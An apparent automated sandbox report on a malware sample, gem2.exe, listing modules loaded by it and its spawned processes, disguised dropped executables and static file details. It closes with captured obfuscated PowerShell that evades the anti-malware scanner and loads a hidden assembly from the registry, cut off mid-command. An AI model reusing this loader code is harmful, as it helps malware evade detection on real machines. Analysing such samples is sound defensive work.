Source: C:\Users\user\Desktop\gem2.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\System-f4855f59e0.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\System-f4855f59e0.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\System-f4855f59e0.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\System-f4855f59e0.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: jsoncpp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: libcrypto-3-x64.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: libcurl.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: zlib1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: comsvcs.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: cmlua.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: cmutil.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: version.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\ReAgentc.exeSection loaded: reagent.dllJump to behavior
Source: C:\Windows\System32\ReAgentc.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\ReAgentc.exeSection loaded: wdscore.dllJump to behavior
Source: C:\Windows\System32\ReAgentc.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\ReAgentc.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Windows\System32\ReAgentc.exeSection loaded: fveapi.dllJump to behavior
Source: C:\Windows\System32\ReAgentc.exeSection loaded: fveapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\takeown.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: propsys.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dll
Source: C:\Windows\System32\lsass.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\lsass.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: comsvcs.dll
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: cmlua.dll
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: cmutil.dll
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: version.dll
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeSection loaded: wldp.dll
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exeSection loaded: schannel.dll
Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dll
Source: C:\Users\user\Desktop\gem2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: gem2.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: gem2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: gem2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\User\vcpkg\buildtrees\jsoncpp\x64-windows-rel\bin\jsoncpp.pdb source: svchost.exe, 00000010.00000002.2552768573.00000173CDFA3000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: d:\agent\_work\7\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: svchost.exe, 00000010.00000002.2553572741.00000173CDFF5000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: svchost.exe, 00000010.00000002.2553168813.00000173CDFE0000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\jsoncpp\x64-windows-rel\bin\jsoncpp.pdb%%" source: svchost.exe, 00000010.00000002.2552768573.00000173CDFA3000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: svchost.exe, 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: svchost.exe, 00000010.00000002.2554832457.00000173CF9BF000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 00000010.00000002.2557783221.00000173CFFDA000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: svchost.exe, 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: svchost.exe, 00000010.00000002.2554832457.00000173CF9BF000.00000002.10000000.00040000.00000000.sdmp

Data Obfuscation

barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer($scwfUeOSfALItM,$EtevswwRQwRAejVCuvR).Invoke(''+[Char](97)+'m'+[Char](115)+''+'i'+''+'.'+''+[Char](100)+''+[Char](108)+'l');$TXsAOQOMQALSJtBsu=$kpBUoTRvoOegOC.Invoke($Nul
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+''+'e'+'ga'+'t'+'e')),[
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+'$'+''+'L'+''+'M'+''+[Char](88)
Obfuscated command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:EtrMmUyKmezi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lQOtNkEZiwxXMY,[Parameter(Position=1)][Type]$pZbFqViXVD)$sbBqvXXfarI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+''+'e'+'ga'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+'m'+[Char](111)+''+[Char](114)+'y'+[Char](77)+'od'+'u'+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','C'+'l'+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'led'+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+'C'+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'to'+'C'+'l'+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$sbBqvXXfarI.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$lQOtNkEZiwxXMY).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$sbBqvXXfarI.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+[